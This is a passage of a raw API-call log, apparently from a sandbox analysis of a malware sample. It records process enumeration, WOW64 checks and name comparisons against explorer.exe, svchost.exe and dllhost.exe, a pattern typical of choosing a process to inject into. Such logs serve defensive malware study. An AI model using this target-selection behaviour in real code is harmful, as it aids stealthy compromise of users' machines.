hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0213.907] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0213.907] CloseHandle (hObject=0xec) returned 1 [0213.907] lstrcmpiA (lpString1="gtjtdfe", lpString2="explorer.exe") returned 1 [0213.907] lstrcmpiA (lpString1="gtjtdfe", lpString2="svchost.exe") returned -1 [0213.908] lstrcmpiA (lpString1="gtjtdfe", lpString2="dllhost.exe") returned 1 [0213.908] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x6c0064, th32ProcessID=0x68006c, th32DefaultHeapID=0x73006f, th32ModuleID=0x2e0074, cntThreads=0x780065, th32ParentProcessID=0x65, pcPriClassBase=0, dwFlags=0x0, szExeFile="gtjtdfe")) returned 0 [0213.908] CloseHandle (hObject=0xe8) returned 1 [0213.908] Sleep (dwMilliseconds=0x3e8) [0214.914] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xe8 [0214.917] Process32First (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0214.917] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0214.917] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0214.918] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0214.918] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0214.918] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x104) returned 0x0 [0214.918] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0214.919] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0214.919] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0214.919] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x17c) returned 0x0 [0214.919] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0214.920] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x188) returned 0x0 [0214.920] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0214.920] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1b0) returned 0x0 [0214.920] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0214.921] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0 [0214.921] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0214.921] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d4) returned 0x0 [0214.921] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0214.922] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1dc) returned 0x0 [0214.922] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0214.922] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x254) returned 0x0 [0214.922] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0214.923] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x298) returned 0x0 [0214.923] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0214.923] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0 [0214.923] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0214.924] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x334) returned 0x0 [0214.924] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0214.924] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x36c) returned 0x0 [0214.924] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0214.925] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a8) returned 0x0 [0214.925] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0214.925] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3f8) returned 0x0 [0214.925] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0214.926] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x124) returned 0x0 [0214.926] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0214.926] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x448) returned 0xec [0214.926] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0214.926] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0214.927] CloseHandle (hObject=0xec) returned 1 [0214.927] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0214.927] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x480) returned 0x0 [0214.927] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0214.928] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4ac) returned 0xec [0214.928] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0214.928] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0214.928] CloseHandle (hObject=0xec) returned 1 [0214.928] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0214.928] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4d4) returned 0x0 [0214.928] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0214.929] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x0 [0214.929] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0214.929] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc4) returned 0xec [0214.929] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0214.929] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0214.929] CloseHandle (hObject=0xec) returned 1 [0214.929] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="explorer.exe") returned -1 [0214.929] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="svchost.exe") returned -1 [0214.929] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="dllhost.exe") returned -1 [0214.930] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0214.930] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x62c) returned 0xec [0214.930] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0214.930] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0214.930] CloseHandle (hObject=0xec) returned 1 [0214.930] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="explorer.exe") returned -1 [0214.930] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="svchost.exe") returned -1 [0214.930] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="dllhost.exe") returned -1 [0214.930] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0214.931] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5a4) returned 0xec [0214.931] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0214.931] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0214.931] CloseHandle (hObject=0xec) returned 1 [0214.931] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="explorer.exe") returned 1 [0214.931] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="svchost.exe") returned -1 [0214.931] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="dllhost.exe") returned 1 [0214.931] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0214.932] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x780) returned 0xec [0214.932] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0214.932] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0214.932] CloseHandle (hObject=0xec) returned 1 [0214.932] lstrcmpiA (lpString1="definitely.exe", lpString2="explorer.exe") returned -1 [0214.932] lstrcmpiA (lpString1="definitely.exe", lpString2="svchost.exe") returned -1 [0214.932] lstrcmpiA (lpString1="definitely.exe", lpString2="dllhost.exe") returned -1 [0214.932] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0214.932] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x240) returned 0xec [0214.932] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0214.932] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0214.932] CloseHandle (hObject=0xec) returned 1 [0214.932] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="explorer.exe") returned 1 [0214.932] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="svchost.exe") returned -1 [0214.932] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="dllhost.exe") returned 1 [0214.932] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0214.933] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c8) returned 0xec [0214.933] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0214.933] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0214.933] CloseHandle (hObject=0xec) returned 1 [0214.933] lstrcmpiA (lpString1="whenever.exe", lpString2="explorer.exe") returned 1 [0214.933] lstrcmpiA (lpString1="whenever.exe", lpString2="svchost.exe") returned 1 [0214.933] lstrcmpiA (lpString1="whenever.exe", lpString2="dllhost.exe") returned 1 [0214.933] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0214.934] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0xec [0214.934] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0214.934] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0214.934] CloseHandle (hObject=0xec) returned 1 [0214.934] lstrcmpiA (lpString1="potentially.exe", lpString2="explorer.exe") returned 1 [0214.934] lstrcmpiA (lpString1="potentially.exe", lpString2="svchost.exe") returned -1 [0214.934] lstrcmpiA (lpString1="potentially.exe", lpString2="dllhost.exe") returned 1 [0214.934] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0214.934] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x314) returned 0xec [0214.934] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0214.934] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0214.934] CloseHandle (hObject=0xec) returned 1 [0214.934] lstrcmpiA (lpString1="seeker.exe", lpString2="explorer.exe") returned 1 [0214.934] lstrcmpiA (lpString1="seeker.exe", lpString2="svchost.exe") returned -1 [0214.935] lstrcmpiA (lpString1="seeker.exe", lpString2="dllhost.exe") returned 1 [0214.935] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0214.935] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x320) returned 0xec [0214.935] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0214.935] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0214.935] CloseHandle (hObject=0xec) returned 1 [0214.935] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="explorer.exe") returned 1 [0214.935] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="svchost.exe") returned -1 [0214.935] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="dllhost.exe") returned 1 [0214.935] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0214.936] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7a4) returned 0xec [0214.936] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0214.936] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0214.936] CloseHandle (hObject=0xec) returned 1 [0214.936] lstrcmpiA (lpString1="birth bean.exe", lpString2="explorer.exe") returned -1 [0214.936] lstrcmpiA (lpString1="birth bean.exe", lpString2="svchost.exe") returned -1 [0214.936] lstrcmpiA (lpString1="birth bean.exe", lpString2="dllhost.exe") returned -1 [0214.936] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0214.936] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x688) returned 0xec [0214.936] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0214.937] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0214.937] CloseHandle (hObject=0xec) returned 1 [0214.937] lstrcmpiA (lpString1="ruby.exe", lpString2="explorer.exe") returned 1 [0214.937] lstrcmpiA (lpString1="ruby.exe", lpString2="svchost.exe") returned -1 [0214.937] lstrcmpiA (lpString1="ruby.exe", lpString2="dllhost.exe") returned 1 [0214.937] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0214.937] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7f0) returned 0xec [0214.937] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0214.937] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0214.937] CloseHandle (hObject=0xec) returned 1 [0214.937] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="explorer.exe") returned 1 [0214.937] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="svchost.exe") returned 1 [0214.937] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="dllhost.exe") returned 1 [0214.937] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0214.938] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d4) returned 0xec [0214.938] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0214.938] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0214.938] CloseHandle (hObject=0xec) returned 1 [0214.938] lstrcmpiA (lpString1="smith.exe", lpString2="explorer.exe") returned 1 [0214.938] lstrcmpiA (lpString1="smith.exe", lpString2="svchost.exe") returned -1 [0214.938] lstrcmpiA (lpString1="smith.exe", lpString2="dllhost.exe") returned 1 [0214.938] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0214.939] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x58c) returned 0xec [0214.939] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0214.939] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0214.939] CloseHandle (hObject=0xec) returned 1 [0214.939] lstrcmpiA (lpString1="spicedespite.exe", lpString2="explorer.exe") returned 1 [0214.939] lstrcmpiA (lpString1="spicedespite.exe", lpString2="svchost.exe") returned -1 [0214.939] lstrcmpiA (lpString1="spicedespite.exe", lpString2="dllhost.exe") returned 1 [0214.939] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0214.939] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x644) returned 0xec [0214.939] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0214.939] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0214.939] CloseHandle (hObject=0xec) returned 1 [0214.939] lstrcmpiA (lpString1="wooden.exe", lpString2="explorer.exe") returned 1 [0214.939] lstrcmpiA (lpString1="wooden.exe", lpString2="svchost.exe") returned 1 [0214.939] lstrcmpiA (lpString1="wooden.exe", lpString2="dllhost.exe") returned 1 [0214.939] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0214.940] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7e0) returned 0xec [0214.940] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0214.940] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0214.940] CloseHandle (hObject=0xec) returned 1 [0214.940] lstrcmpiA (lpString1="dallasr.exe", lpString2="explorer.exe") returned -1 [0214.940] lstrcmpiA (lpString1="dallasr.exe", lpString2="svchost.exe") returned -1 [0214.940] lstrcmpiA (lpString1="dallasr.exe", lpString2="dllhost.exe") returned -1 [0214.940] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0214.941] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5d8) returned 0xec [0214.941] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0214.941] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0214.941] CloseHandle (hObject=0xec) returned 1 [0214.941] lstrcmpiA (lpString1="bags shakira tourism.exe", 